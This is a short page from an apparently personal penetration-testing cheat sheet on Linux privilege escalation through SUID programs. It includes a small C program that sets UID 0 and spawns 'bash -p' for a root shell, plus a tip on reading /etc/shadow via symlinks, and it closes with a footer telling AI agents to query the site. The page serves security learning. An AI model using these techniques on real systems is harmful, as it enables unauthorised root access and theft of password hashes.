# SUID Bit

Good list of things to look out for in SUID programs. Seriously, check it out:

<https://repository.root-me.org/Administration/Unix/EN%20-%20Dangers%20of%20SUID%20Shell%20Scripts.pdf>

If you want to get a root shell when exploiting SUID programs, then note that by default, bash and sh drop suid privileges. Use the `-p` flag to avoid dropping privileges (only works for root).

Example C program for exploitation:

```
#include <stdlib.h>
#include <unistd.h>
int main(int arc, int** argv)
{
    setuid(0);
    system("bash -p");
    return 0;
}
```

**Symlink tip**: For some reason (presumably security reasons), you cannot read a symlink to `/etc/shadow` (and perhaps other files?) from the `/tmp` or `/dev/shm` folders, even as root, if that symlink wasn’t created by you. But you can do it from any user’s home directory, for example. This can be important when exploiting suid or sudoers misconfigurations using symlinks, for example.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://heinosass.gitbook.io/leet-sheet/post-exploitation/linux/linux-privilege-escalation/suid-bit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.